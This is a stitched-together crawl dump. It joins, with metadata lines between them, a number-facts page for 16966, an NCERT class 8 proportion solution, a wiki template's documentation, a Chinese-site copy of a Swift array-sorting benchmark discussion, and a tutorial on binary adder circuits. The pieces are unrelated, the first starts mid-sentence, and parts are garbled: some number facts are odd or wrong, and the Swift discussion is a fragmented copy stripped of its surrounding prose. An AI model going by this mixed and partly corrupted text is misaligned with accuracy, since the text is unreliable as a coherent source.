positive result, CIN and COUT are both 1, so no overflow is detected and the carry bit will be discarded.", null, "### Adding Twos Complement Negative Numbers\n\nTable 4.1.6 shows the effect of adding two negative values where the sum is less than +127₁₀ therefore a correct negative result of −73₁₀ (in twos complement notation) has been obtained. Both CIN and COUT are logic 1 and no overflow will be signalled. 
As only 8−bit calculations are being considered, the carry will be discarded.", null, "### Out of Range Result Causes Overflow\n\nWhen the addition of two positive numbers shown in Table 4.1.7 results in a sum greater than +127₁₀ the sign bit is changed from 0 to 1, incorrectly signifying a negative result. As the ‘carry in’ from bit 6 to bit 7 is 1 and the ‘carry out’ from bit 7 into the Carry bit is 0 an overflow is detected indicating an incorrect answer.\n\nNotice that if the result of 10011101₂ were to be considered as an unsigned binary value, the addition in Table 4.1.7 would be correct (157₁₀). However as the calculation is using twos complement notation, the answer of −99₁₀ must be considered as wrong.", null, "### Out of Range Addition of Negative Values\n\nTable 4.1.8 shows that adding two negative values can also produce a change in sign and a wrong twos complement result if it is more negative than −128₁₀. In this case adding −63₁₀ and −73₁₀ should have produced a negative result of −136₁₀ and not +120₁₀. To check this, the correct answer (although still with the wrong sign) could be obtained if, noting that an overflow had occurred, the answer was complemented and 1 added, giving an unsigned binary result of 10001000₂ which converts to 128 + 8 = 136₁₀. Overflow errors can be corrected, but this would require either some additional electronics or a software action in response to the overflow signal.\n\nThe adders described in this module are generally called Ripple Carry Adders because of the way that the carry bit is propagated from one stage of the adder to the next, rippling through the chain of full adders until the carry out is produced at the carry out pin of the final stage.\n\nThis process takes some time, which is proportional to the number of bits added. 
Although this may be a minor problem in small adders, with an increase in the number of bits in the binary words to be added, the time delay before the final carry out is produced becomes unacceptable.\n\nTo overcome this problem, IC manufacturers offer a range of ‘Carry Look Ahead Adders’ in which the addition and carry out are produced simultaneously. The system uses complex combinational logic to assess whether, at each individual adder a carry will be produced, based on the state of the A and B inputs to that stage, and the logic state of the carry in bit to the first stage.", null, "Fig. 4.1.7 shows an arrangement for producing a carry out by splitting the full adder into a partial full adder (grey block), which has two additional outputs, a propagate (P) output that takes a logic 1 output whenever inputs A and B are 1,0 or 0,1 and a generate (G) output that will be logic 1 whenever the A and B inputs are at 1,1. Using this information it is possible to decide on the logic state of the carry out depending on a combination of the CIN state and the A and B states.\n\nIn the carry generator (blue block), the P input is ANDed with the CIN and ORed with the G input to produce a carry out. The carry out is fed to the successive adders in the normal way, but the CIN P and G signals are fed in parallel to the other adder stages, where the state of the carry out for each adder stage can be ascertained from the shared CIN signal and the A and B states for the successive stages, depending on the input states at each stage, rather than waiting for the calculations to complete at all the stages.", null, "", null, "" ]
[ null, "https://learnabout-electronics.org/Digital/images/half-adder.gif", null, "https://learnabout-electronics.org/Digital/images/sim-icon.jpg", null, "https://learnabout-electronics.org/Digital/images/half-adder.gif", null, "https://learnabout-electronics.org/Digital/images/adder-full.gif", null, "https://learnabout-electronics.org/Digital/images/table-4-1-2.gif", null, "https://learnabout-electronics.org/Digital/images/adder-4-bit-parallel.gif", null, "https://learnabout-electronics.org/Digital/images/sim-icon.jpg", null, "https://learnabout-electronics.org/Digital/images/add-sub-8-bit.gif", null, "https://learnabout-electronics.org/Digital/images/sim-icon.jpg", null, "https://learnabout-electronics.org/Digital/images/table-4-1-3.gif", null, "https://learnabout-electronics.org/Digital/images/table-4-1-4.gif", null, "https://learnabout-electronics.org/Digital/images/table-4-1-5.gif", null, "https://learnabout-electronics.org/Digital/images/table-4-1-6.gif", null, "https://learnabout-electronics.org/Digital/images/table-4-1-7.gif", null, "https://learnabout-electronics.org/Digital/images/table-4-1-8.gif", null, "https://learnabout-electronics.org/Digital/images/adder-CLA.gif", null, "https://learnabout-electronics.org/Digital/images/CLA-block.gif", null, "https://learnabout-electronics.org/Digital/images/M14008B.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.91859263,"math_prob":0.9621734,"size":11553,"snap":"2021-31-2021-39","text_gpt3_token_len":2813,"char_repetition_ratio":0.1436488,"word_repetition_ratio":0.015230843,"special_character_ratio":0.23881243,"punctuation_ratio":0.09620991,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99527705,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36],"im_url_duplicate_count":[null,6,null,null,null,6,null,3,null,3,null,3,null,null,null,3,null,null,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-24T17:24:14Z\",\"WARC-Record-ID\":\"<urn:uuid:c5edefe4-ed4a-4614-a17b-307b172dcbf3>\",\"Content-Length\":\"28665\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b42649ae-6832-48d7-b239-424512132c0c>\",\"WARC-Concurrent-To\":\"<urn:uuid:0abcaefa-b3fd-4f77-b18e-edb1cbd1d5aa>\",\"WARC-IP-Address\":\"217.160.0.248\",\"WARC-Target-URI\":\"https://learnabout-electronics.org/Digital/dig41.php\",\"WARC-Payload-Digest\":\"sha1:A3VMBXDP3EYV3VQQ6OUKVRRSNS3MOIZJ\",\"WARC-Block-Digest\":\"sha1:UWZJKT7QG5O6JT4OQPQ5O4OROIMOOVT5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046150307.84_warc_CC-MAIN-20210724160723-20210724190723-00204.warc.gz\"}"}
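The half adder, full adder, ripple-carry chain and the CIN/COUT overflow rule described above can be simulated directly; a minimal Python sketch (function names and the example operands are mine):

```python
def half_adder(a, b):
    return a ^ b, a & b            # (sum, carry): XOR gate and AND gate

def full_adder(a, b, cin):
    s1, c1 = half_adder(a, b)      # two half adders...
    s, c2 = half_adder(s1, cin)
    return s, c1 | c2              # ...with the carries ORed together

def to_bits(n, width=8):
    """Twos-complement bits, little-endian (arithmetic shift handles n < 0)."""
    return [(n >> i) & 1 for i in range(width)]

def ripple_add(a_bits, b_bits, cin=0):
    """Ripple-carry add; returns (sum_bits, carry_out, overflow flag)."""
    out, carry, carry_into_msb = [], cin, 0
    for i, (a, b) in enumerate(zip(a_bits, b_bits)):
        if i == len(a_bits) - 1:
            carry_into_msb = carry          # CIN of the sign-bit adder
        s, carry = full_adder(a, b, carry)
        out.append(s)
    overflow = carry_into_msb ^ carry       # XOR of sign-bit CIN and COUT
    return out, carry, overflow

# 100 + 57 = 157 > +127: sign bit flips to 1, overflow detected.
s, cout, ovf = ripple_add(to_bits(100), to_bits(57))
assert ovf == 1 and s[7] == 1

# 100 + (-69) = 31: in range, no overflow; the final carry is discarded.
s, cout, ovf = ripple_add(to_bits(100), to_bits(-69))
assert ovf == 0 and s == to_bits(31)
```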
https://www.biostars.org/p/191500/
[ "Question: taking intersection between two networks\n1\nA3.7k wrote:\n\nHi,\n\nI have two networks; I took the intersection between them, but I can't get the edge list from the data.frame.\n\nDoes anyone know the reason for the error, please?\n\nlibrary(igraph)\n\nAT1G01060 AT1G01170 AT1G01260 AT1G01380\n\nAT1G01060 0.0000000 0.6397474 0.0000000 2.6052533\n\nAT1G01170 0.6397474 0.0000000 0.2676777 0.0000000\n\nAT1G01260 0.0000000 0.2676777 0.0000000 0.5220432\n\nAT1G01380 2.6052533 0.0000000 0.5220432 0.0000000\n\nAT1G01490 2.5364855 2.5912206 1.6262291 0.6899495\n\nAT1G01500 0.6131010 0.0000000 0.0000000 1.7374863\n\ndim(clr)\n\n 2857 2857\n\nclr <- as.matrix(clr)\n\nAT1G01060 AT1G01170 AT1G01260 AT1G01380\n\nAT1G01060 0.000000e+00 3.397888e-04 5.573000e-04 8.577027e-05\n\nAT1G01170 2.161158e-03 0.000000e+00 3.510125e-04 3.373863e-06\n\nAT1G01260 4.630123e-07 1.294916e-05 0.000000e+00 9.821657e-05\n\nAT1G01380 2.172965e-05 1.112968e-04 2.950147e-04 0.000000e+00\n\nAT1G01490 1.987599e-03 7.534076e-06 1.634816e-06 3.346604e-05\n\nAT1G01500 8.453009e-05 4.127081e-05 1.531739e-05 7.116557e-05\n\ndim(GENEI3)\n\n 2857 2857\n\ng_sim <- graph.intersection(g_1, g_2, byname = \"auto\", keep.all.vertices = FALSE)\n\nedge_ara <- get.data.frame(g, what = \"edges\")\n\nedge_ara <- edge_ara[order(abs(edge_ara$weight), decreasing = T),]\n\nError in abs(edge_ara$weight) : non-numeric argument to mathematical function\n\nThank you\n\nR software error • 1.2k views\nwritten 4.0 years ago by A3.7k\n1\n\nHi, I would suggest you print out edge_ara$weight to a text file and check whether you find any suspicious non-numeric values. If there are any, just remove them and run the script.\n\n1\n\nThank you. I inspected edge_ara <- get.data.frame(g, what = \"edges\") but the data frame was empty; then edge_ara <- edge_ara[order(abs(edge_ara$weight), decreasing = T),] gives me the error, but I don't know why the data frame was empty.\n\n2\n\nJust go step by step and check whether the data is there in each variable before you go on to the subsequent analysis.\n\n1\n\nYou need to check the values of g_1, g_2 and g_sim, and first see what the overlap is!" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.58680487,"math_prob":0.93401843,"size":2300,"snap":"2020-24-2020-29","text_gpt3_token_len":906,"char_repetition_ratio":0.13545296,"word_repetition_ratio":0.028673835,"special_character_ratio":0.4926087,"punctuation_ratio":0.20558882,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9732871,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-05-27T03:29:57Z\",\"WARC-Record-ID\":\"<urn:uuid:91e56531-a1b1-4bce-abdc-6fe9a0e7319d>\",\"Content-Length\":\"30254\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0605be82-907b-44eb-894d-9cb45667e993>\",\"WARC-Concurrent-To\":\"<urn:uuid:50604421-4e20-4e64-a4a0-92d24a2f10dc>\",\"WARC-IP-Address\":\"69.164.220.180\",\"WARC-Target-URI\":\"https://www.biostars.org/p/191500/\",\"WARC-Payload-Digest\":\"sha1:HUIIS3T6KAZ2TAPW7OKP2PGSX7WZB5SP\",\"WARC-Block-Digest\":\"sha1:KPXFGWMY55WZOQXDZFNN3YPCE3KJ4GVW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-24/CC-MAIN-2020-24_segments_1590347392057.6_warc_CC-MAIN-20200527013445-20200527043445-00083.warc.gz\"}"}
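The idea behind `graph.intersection` in the thread above can be sanity-checked by hand: an edge survives only if it is present in both networks. The sketch below uses plain Python sets on tiny made-up matrices, so the threshold convention is my own, not igraph's:

```python
def edge_set(adjacency, names, threshold=0.0):
    """Undirected edges {frozenset({u, v}): weight} above a cutoff."""
    edges = {}
    for i, u in enumerate(names):
        for j, v in enumerate(names):
            # Upper triangle only, so each undirected edge appears once.
            if i < j and adjacency[i][j] > threshold:
                edges[frozenset((u, v))] = adjacency[i][j]
    return edges

# Toy 3x3 versions of the CLR and GENIE3 matrices (values are made up).
names = ["AT1G01060", "AT1G01170", "AT1G01260"]
clr = [[0.0, 0.64, 0.0],
       [0.64, 0.0, 0.27],
       [0.0, 0.27, 0.0]]
genie3 = [[0.0, 3.4e-4, 5.6e-4],
          [2.2e-3, 0.0, 3.5e-4],
          [4.6e-7, 1.3e-5, 0.0]]

e1 = edge_set(clr, names)
e2 = edge_set(genie3, names, threshold=1e-4)
common = e1.keys() & e2.keys()   # the intersection network's edge set
assert frozenset(("AT1G01060", "AT1G01170")) in common
```

This also illustrates the debugging advice in the answers: if `common` (here, or `g_sim` in igraph) is empty, the downstream edge data frame will be empty too, and sorting by `$weight` fails.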
https://metanumbers.com/60925
[ "# 60925 (number)\n\n60,925 (sixty thousand nine hundred twenty-five) is an odd five-digit composite number following 60924 and preceding 60926. In scientific notation, it is written as 6.0925 × 10⁴. The sum of its digits is 22. It has a total of 3 prime factors and 6 positive divisors. There are 48,720 positive integers (up to 60925) that are relatively prime to 60925.\n\n## Basic properties\n\n• Is Prime? No\n• Number parity Odd\n• Number length 5\n• Sum of Digits 22\n• Digital Root 4\n\n## Name\n\nShort name 60 thousand 925 sixty thousand nine hundred twenty-five\n\n## Notation\n\nScientific notation 6.0925 × 10⁴ 60.925 × 10³\n\n## Prime Factorization of 60925\n\nPrime Factorization 5² × 2437\n\nComposite number\nDistinct Factors Total Factors Radical ω(n) 2 Total number of distinct prime factors Ω(n) 3 Total number of prime factors rad(n) 12185 Product of the distinct prime numbers λ(n) -1 Returns the parity of Ω(n), such that λ(n) = (-1)^Ω(n) μ(n) 0 Returns: 1, if n has an even number of prime factors (and is square free) −1, if n has an odd number of prime factors (and is square free) 0, if n has a squared prime factor Λ(n) 0 Returns log(p) if n is a power pᵏ of any prime p (for any k >= 1), else returns 0\n\nThe prime factorization of 60,925 is 5² × 2437. 
Since it has a total of 3 prime factors, 60,925 is a composite number.\n\n## Divisors of 60925\n\n1, 5, 25, 2437, 12185, 60925\n\n6 divisors\n\n Even divisors 0 6 6 0\nTotal Divisors Sum of Divisors Aliquot Sum τ(n) 6 Total number of the positive divisors of n σ(n) 75578 Sum of all the positive divisors of n s(n) 14653 Sum of the proper positive divisors of n A(n) 12596.3 Returns the sum of divisors (σ(n)) divided by the total number of divisors (τ(n)) G(n) 246.83 Returns the nth root of the product of n divisors H(n) 4.83672 Returns the total number of divisors (τ(n)) divided by the sum of the reciprocal of each divisors\n\nThe number 60,925 can be divided by 6 positive divisors (out of which 0 are even, and 6 are odd). The sum of these divisors (counting 60,925) is 75,578, the average is 125,96.,333.\n\n## Other Arithmetic Functions (n = 60925)\n\n1 φ(n) n\nEuler Totient Carmichael Lambda Prime Pi φ(n) 48720 Total number of positive integers not greater than n that are coprime to n λ(n) 12180 Smallest positive number such that aλ(n) ≡ 1 (mod n) for all a coprime to n π(n) ≈ 6127 Total number of primes less than or equal to n r2(n) 24 The number of ways n can be represented as the sum of 2 squares\n\nThere are 48,720 positive integers (less than 60,925) that are coprime with 60,925. 
And there are approximately 6,127 prime numbers less than or equal to 60,925.\n\n## Divisibility of 60925\n\n m n mod m 2 3 4 5 6 7 8 9 1 1 1 0 1 4 5 4\n\nThe number 60,925 is divisible by 5.\n\n• Deficient\n\n• Polite\n\n## Base conversion (60925)\n\nBase System Value\n2 Binary 1110110111111101\n3 Ternary 10002120111\n4 Quaternary 32313331\n5 Quinary 3422200\n6 Senary 1150021\n8 Octal 166775\n10 Decimal 60925\n12 Duodecimal 2b311\n20 Vigesimal 7c65\n36 Base36 1b0d\n\n## Basic calculations (n = 60925)\n\n### Multiplication\n\nn×y\n n×2 121850 182775 243700 304625\n\n### Division\n\nn÷y\n n÷2 30462.5 20308.3 15231.2 12185\n\n### Exponentiation\n\nny\n n2 3711855625 226144803953125 13777872180844140625 839416862617929267578125\n\n### Nth Root\n\ny√n\n 2√n 246.83 39.3488 15.7108 9.05647\n\n## 60925 as geometric shapes\n\n### Circle\n\n Diameter 121850 382803 1.16611e+10\n\n### Sphere\n\n Volume 9.47273e+14 4.66446e+10 382803\n\n### Square\n\nLength = n\n Perimeter 243700 3.71186e+09 86161\n\n### Cube\n\nLength = n\n Surface area 2.22711e+10 2.26145e+14 105525\n\n### Equilateral Triangle\n\nLength = n\n Perimeter 182775 1.60728e+09 52762.6\n\n### Triangular Pyramid\n\nLength = n\n Surface area 6.42912e+09 2.66514e+13 49745.1\n\n## Cryptographic Hash Functions\n\nmd5 ab7516dda6d82b5d330c69b6a9d1a490 3223126ae9f6eec2919b649045a68d0eca671120 306184c7005240b32c89b0abae4e6c8ed0e7b8641ce5ae6d69076c071110622d 63949f348d32156b12419bf1a08253a245b9c7ae99096be17325368030844f0ca07290bf06bc6f171210098267180ed890fd3e4db72fc98ba50b3cc394dfcc3e c17e9a3df9bfac1bae68576af3acb40f264ed6d5" ]
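The divisor and totient figures above are easy to verify with a short script. The sketch below is my own illustration; the helper names `divisors` and `totient` are not from the source page.

```python
def divisors(n):
    """All positive divisors of n, found by trial division up to sqrt(n)."""
    small = [d for d in range(1, int(n ** 0.5) + 1) if n % d == 0]
    return sorted(set(small) | {n // d for d in small})

def totient(n):
    """Euler's phi(n): multiply n by (1 - 1/p) for each distinct prime p."""
    result, m, p = n, n, 2
    while p * p <= m:
        if m % p == 0:
            while m % p == 0:
                m //= p
            result -= result // p
        p += 1
    if m > 1:  # a leftover prime factor larger than sqrt(m)
        result -= result // m
    return result

divs = divisors(60925)
# divs -> [1, 5, 25, 2437, 12185, 60925]
# sum(divs) -> 75578 (sigma); sum(divs) - 60925 -> 14653 (aliquot sum)
# totient(60925) -> 48720
```

With τ(n) = len(divs) and σ(n) = sum(divs), the "deficient" classification above is simply the check s(n) = σ(n) − n < n.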
https://www.idiap.ch/software/bob/docs/bob/bob.rppg.base/stable/py_api_cvpr14.html
Li's CVPR14 Python API

Signals extraction

Builds a mask on the lower part of the face.

The mask is built using selected keypoints retrieved by a Discriminative Response Map Fitting (DRMF) algorithm. Note that the DRMF is not implemented here, and that the keypoints are loaded from file (and are not provided in the package). Note also that this function is explicitly made for the keypoint set generated by the Matlab software downloaded from http://ibug.doc.ic.ac.uk/resources/drmf-matlab-code-cvpr-2013/

Update: this function also works when using bob.ip.dlib.DlibLandmarkExtraction.

Parameters:
• image (numpy.ndarray) – the current frame.
• keypoints (numpy.ndarray) – the set of 66 keypoints retrieved by DRMF.
• indent (int) – the percentage of the face width [in pixels] by which selected keypoints are shifted inside the face to build the mask. The face width is defined by the distance between the two keypoints located on the right and left edges of the face, at the eyes' height.
• plot (bool) – if set to True, plots the current face with the selected keypoints and the built mask.

Returns:
• mask (numpy.ndarray) – a boolean array of the size of the original image, where the region corresponding to the mask is True.
• mask_points (list of tuple) – the points corresponding to the vertices of the mask.

Returns a boolean array where the mask is True.

It turns mask points into a region of interest and returns the corresponding boolean array, of the same size as the image.

Parameters:
• image (numpy.ndarray) – the current frame.
• mask_points (list of tuple) – the points corresponding to the vertices of the mask.

Returns: mask (numpy.ndarray) – a boolean array of the size of the original image, where the region corresponding to the mask is True.

bob.rppg.cvpr14.extract_utils.get_good_features_to_track(face, npoints, quality=0.01, min_distance=10, plot=False)

Applies the OpenCV function "good features to track".

Parameters:
• face (numpy.ndarray) – the cropped face image.
• npoints (int) – the maximum number of strong corners you want to detect.
• quality (float) – the minimum relative quality of the detected corners. Note that increasing this value decreases the number of detected corners. Defaults to 0.01.
• min_distance (int) – minimum Euclidean distance between detected corners.
• plot (bool) – whether to plot the currently selected features to track.

Returns: corners (numpy.ndarray) – the detected strong corners.

bob.rppg.cvpr14.extract_utils.track_features(previous, current, previous_points, plot=False)

Projects the features from the previous frame into the current frame.

Parameters:
• previous (numpy.ndarray) – the previous frame.
• current (numpy.ndarray) – the current frame.
• previous_points (numpy.ndarray) – the set of keypoints to track (in the previous frame).
• plot (bool) – plots the keypoints projected on the current frame.

Returns: current_points (numpy.ndarray) – the set of keypoints in the current frame.

bob.rppg.cvpr14.extract_utils.find_transformation(previous_points, current_points)

Finds the transformation matrix from previous points to current points.

The transformation matrix is found using estimateRigidTransform (fancier alternatives have been tried, but are not that stable).

Parameters:
• previous_points (numpy.ndarray) – set of 'starting' 2d points.
• current_points (numpy.ndarray) – set of 'destination' 2d points.

Returns: transformation_matrix (numpy.ndarray) – the affine transformation matrix between the two sets of points.

Applies the transformation matrix to the mask points of the previous frame.

Parameters:
• previous_mask_points (numpy.ndarray) – the points forming the mask in the previous frame.
• transformation_matrix (numpy.ndarray) – the affine transformation matrix between the two sets of points.

Returns: numpy.ndarray

Computes the average green color within a given mask.

Parameters:
• image (numpy.ndarray) – the image containing the face.
• mask (numpy.ndarray) – a boolean array of the size of the original image, where the region corresponding to the mask is True.
• plot (bool) – plot the mask as an overlay on the original image.

Returns: color (numpy.ndarray) – the average RGB colors inside the mask ROI.

bob.rppg.cvpr14.extract_utils.compute_average_colors_wholeface(image, plot=False)

Computes the average green color within the provided face image.

Parameters:
• image (numpy.ndarray) – the cropped face image.
• plot (bool) – plot the mask as an overlay on the original image.

Returns: color (float) – the average green color inside the face.

Illumination rectification

bob.rppg.cvpr14.illum_utils.rectify_illumination(face_color, bg_color, step, length)

Performs illumination rectification.

The correction is made on the face green values using the background green values, so as to remove global illumination variations in the face green color signal.

Parameters:
• face_color (numpy.ndarray) – the mean green value of the face across the video sequence.
• bg_color (numpy.ndarray) – the mean green value of the background across the video sequence.
• step (float) – step size in the filter's weight adaptation.
• length (int) – length of the filter.

Returns: rectified color (numpy.ndarray) – the mean green values of the face, corrected for illumination variations.

bob.rppg.cvpr14.illum_utils.nlms(signal, desired_signal, n_filter_taps, step, initCoeffs=None, adapt=True)

Normalized least mean square filter.

Parameters:
• signal (numpy.ndarray) – the signal to be filtered.
• desired_signal (numpy.ndarray) – the target signal.
• n_filter_taps (int) – the number of filter taps (related to the filter order).
• step (float) – adaptation step for the filter weights.
• initCoeffs (numpy.ndarray) – initial values for the weights. Defaults to zero.
• adapt (bool) – if True, adapt the filter weights. If False, only filter.

Returns:
• y (numpy.ndarray) – the filtered signal.
• e (numpy.ndarray) – the error signal (difference between filtered and desired).
• w (numpy.ndarray) – the found weights of the filter.

Motion correction

bob.rppg.cvpr14.motion_utils.build_segments(signal, length)

Builds an array containing segments of the signal.

The signal is divided into segments of the provided length (no overlap) and the different segments are stacked.

Parameters:
• signal (numpy.ndarray) – the signal to be processed.
• length (int) – the length of the segments.

Returns:
• segments (numpy.ndarray) – the segments composing the signal.
• end_index (int) – the length of the signal (there may be a trail smaller than a segment at the end of the signal, which will be discarded).

bob.rppg.cvpr14.motion_utils.prune_segments(segments, threshold)

Removes segments.

Segments are removed if their standard deviation is higher than the provided threshold.

Parameters:
• segments (numpy.ndarray) – the set of segments.
• threshold (float) – threshold on the standard deviation.

Returns:
• pruned_segments (numpy.ndarray) – the set of "stable" segments.
• gaps (list of length (# of retained segments)) – boolean list that tells if a gap should be accounted for when building the final signal.
• cut_index (list of tuples) – contains the start and end index of each removed segment. Used for plotting purposes.

bob.rppg.cvpr14.motion_utils.build_final_signal(segments, gaps)

Builds the final signal with the remaining segments.

Parameters:
• segments (numpy.ndarray) – the set of remaining segments.
• gaps (list) – boolean list that tells if a gap should be accounted for when building the final signal.

Returns: final_signal (numpy.ndarray) – the final signal.

bob.rppg.cvpr14.motion_utils.build_final_signal_cvpr14(segments, gaps)

Builds the final signal with the remaining segments.

Warning: this contains a bug! It builds the final signal, but reproduces the bug found in the code provided by the authors of [li-cvpr-2014]. The bug is in the 'collage' of remaining segments: the gap is not always properly accounted for.

Parameters:
• segments (numpy.ndarray) – the set of remaining segments.
• gaps (list) – boolean list that tells if a gap should be accounted for when building the final signal.

Returns: final_signal (numpy.ndarray) – the final signal.

Filtering

bob.rppg.cvpr14.filter_utils.detrend(signal, Lambda)

Applies a detrending filter.

This code is based on the article "An advanced detrending method with application to HRV analysis", Tarvainen et al., IEEE Transactions on Biomedical Engineering, 2002.

Parameters:
• signal (numpy.ndarray) – the signal from which you want to remove the trend.
• Lambda (int) – the smoothing parameter.

Returns: filtered_signal (numpy.ndarray) – the detrended signal.

bob.rppg.cvpr14.filter_utils.average(signal, window_size)

Moving average filter.

Parameters:
• signal (numpy.ndarray) – the signal to filter.
• window_size (int) – the size of the window used to compute the average.

Returns: filtered_signal (numpy.ndarray) – the averaged signal.
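As a concrete illustration of the `nlms` signature documented above, here is a minimal re-implementation of a normalized least-mean-squares filter. This is my own sketch, not the bob.rppg source code; the `eps` regularisation term and the system-identification demo at the bottom are my additions.

```python
import numpy as np

def nlms(signal, desired_signal, n_filter_taps, step, init_coeffs=None, adapt=True, eps=1e-8):
    """Normalized LMS adaptive filter (illustrative sketch of the documented API)."""
    w = np.zeros(n_filter_taps) if init_coeffs is None else np.asarray(init_coeffs, dtype=float)
    n = len(signal)
    y = np.zeros(n)  # filtered signal
    e = np.zeros(n)  # error signal (desired - filtered)
    for i in range(n_filter_taps - 1, n):
        x = signal[i - n_filter_taps + 1:i + 1][::-1]  # newest sample first
        y[i] = w @ x
        e[i] = desired_signal[i] - y[i]
        if adapt:
            # step size normalised by the instantaneous input power
            w = w + step * e[i] * x / (eps + x @ x)
    return y, e, w

# System-identification demo: recover the taps of a known FIR filter.
rng = np.random.default_rng(0)
x = rng.standard_normal(4000)
true_taps = np.array([0.5, -0.3, 0.2])
d = np.convolve(x, true_taps)[:len(x)]
y, e, w = nlms(x, d, 3, step=0.5)
# w converges towards true_taps, and the late error terms approach zero
```

The normalisation by input power (the `x @ x` term) is what distinguishes NLMS from plain LMS: it makes the adaptation step scale-invariant with respect to the input signal.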
https://annualreporting.info/convertible-note-with-embedded-derivative-the-numbers/
# Convertible note with embedded derivative: the numbers

This page provides the numbers for the case, together with the journal entries and calculations. In practice, many conversion features in convertible notes fail equity classification, which means that the conversion feature is a financial liability.

The reason that many conversion features fail equity classification is that they contain contractual terms that give the holder of the conversion feature rights that differ from those of existing shareholders. This is because the contractual terms mean that either:

• the number of shares to be issued varies,
• the amount of cash (or the carrying amount of the liability) converted into shares varies, or
• both the number of shares and the amount of cash (the carrying amount of the liability) vary.

The commercial effect of this is that the holder of the conversion feature obtains a different return in comparison with an investor that holds equity shares. See also Convertible note with embedded derivative – Basics.

## Example

Entity B issues a note with a face value of CU 1,000 and a maturity of three years from its date of issue. The note pays a 10% annual coupon and, on maturity at the end of three years, the holder has an option either to receive a cash repayment of CU 1,000 or to convert the note into Entity B's shares. The note would be converted into Entity B's shares using the average of the lowest five-day volume weighted average price (VWAP) in the 30 days prior to maturity. The conversion feature is determined to have a fair value of CU 20 at issue date.

Entity B incurred transaction costs of CU 100 in issuing the convertible note.

## Analysis

[Figure: liability and equity classification flowchart under IAS 32]

Using the flowchart above for the entire instrument, it is assessed as being a financial liability with an embedded derivative liability. The analysis is as follows:

1. Step 1 is to consider whether there is a contractual obligation to pay cash that the issuer cannot avoid. The answer is yes: the issuer has to pay an annual cash coupon and could be required to repay the capital amount at the end of three years if the holder chooses not to exercise the conversion option.
2. Step 2 is to consider whether IAS 32.16A-D apply. These paragraphs set out a specific and specialist exception from the requirement to classify certain financial instruments, which the issuer has an obligation (or potential obligation) to repurchase, as financial liabilities. This exception does not typically apply to convertible instruments and is not applicable in this example.
3. Step 3 is to consider whether the instrument has any characteristics that are similar to equity. The answer is yes, as the instrument contains an option to be converted into equity instruments. Whether the conversion feature meets the criteria to be classified as equity is dealt with separately.

For the purposes of the compound instrument, the host debt component is classified as a financial liability in its entirety. This is because there is an obligation to pay cash that the issuer cannot avoid (see above) and, for this component on a stand-alone basis, there is no feature that is similar to equity.

The conversion feature is then assessed, again on a stand-alone basis, starting with the box at the top left-hand side of the diagram:

• There is no contractual obligation to pay cash that the issuer cannot avoid. The equity conversion feature can only be settled through the issue of equity shares; otherwise it simply expires unexercised.
• However, there is an obligation to issue a variable number of shares: the number of shares to be issued is based on the lowest five-day VWAP in the last 30 days prior to maturity.

Consequently, the conversion feature is also classified as a liability.

This means that the note contains the following components:

• contractual cash flows of 10% annual coupons and a cash repayment of CU 1,000 (a liability), and
• the conversion feature to convert the liability into equity of the issuer at the lowest five-day share price in the 30 days prior to maturity (an embedded derivative liability).

For convertible notes with embedded derivative liabilities, the embedded derivative liability is determined first and the residual value is assigned to the debt host liability. Therefore, the debt host liability is initially recognised at CU 980, being the residual value from deducting the fair value of the derivative liability from the transaction price (i.e. CU 1,000 less CU 20).

## Transaction costs

Transaction costs are apportioned between the debt liability and the embedded derivative. The portion attributed to the conversion feature is immediately expensed, because the embedded derivative liability is accounted for at fair value through profit or loss. The portion of transaction costs attributed to the loan is added to the carrying amount of the financial liability and amortised as part of the effective interest rate.

Entity B adjusts the carrying amount of the liability component for transaction costs incurred as follows:

| Component | Fair value before transaction costs (A) | % | Transaction costs allocated (B) | A − B = carrying amount |
| Liability | CU 980 | 98% | CU 98 | CU 882 |
| Derivative liability | CU 20 | 2% | CU 2 (expensed to profit or loss) | CU 20 (at fair value) |
| Total | CU 1,000 | 100% | CU 100 | |

The effective interest rate is recalculated after adjusting for the transaction costs; for the host liability component it is 15.18% (this is determined by establishing the rate required to discount the contractual cash flows back to the carrying amount, as adjusted for transaction costs). Entity B will therefore record interest expense at the effective interest rate (15.18%). The difference between the interest expense (15.18%) and the cash coupon (10%) increases the carrying amount of the liability so that, on maturity, the carrying amount equals the cash payment that might be required to be made.

The following table shows the balance of the liability component over the life of the loan:

| Year | Opening | Interest (15.18%) | Cash coupon | Closing |
| 1 | CU 882 | CU 134 | CU (100) | CU 916 |
| 2 | CU 916 | CU 139 | CU (100) | CU 955 |
| 3 | CU 955 | CU 145 | CU (100) | CU 1,000 |

## Derivative liability

The fair value of the conversion feature has to be determined at each reporting date, with fair value changes recognised in profit or loss. The following table sets out the effect on profit or loss, assuming the fair values below at each year end (the fair value at issue is CU (20)):

| Year | Fair value of conversion feature | Profit or (loss) effect |
| 1 | CU (100) | CU (80) |
| 2 | CU 0 | CU 100 |
| 3 | CU (300) | CU (300) |

Thus, if the conversion feature is classified as a derivative liability, this will often lead to a significantly higher and more volatile expense pattern in trading profit or loss. This is because a derivative liability is remeasured to fair value at each reporting date, whereas if the conversion feature meets equity classification, no remeasurement of the conversion feature is required.
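The effective interest rate and the liability table above can be reproduced with a few lines of code. This is my own sketch (the function names are illustrative): the rate is found by bisection as the discount rate that brings the contractual cash flows (two coupons of CU 100 and a final CU 1,100) back to the CU 882 carrying amount.

```python
def effective_interest_rate(carrying_amount, cash_flows, lo=0.0, hi=1.0, tol=1e-12):
    """Bisection for the rate that discounts cash_flows (one per year) to carrying_amount."""
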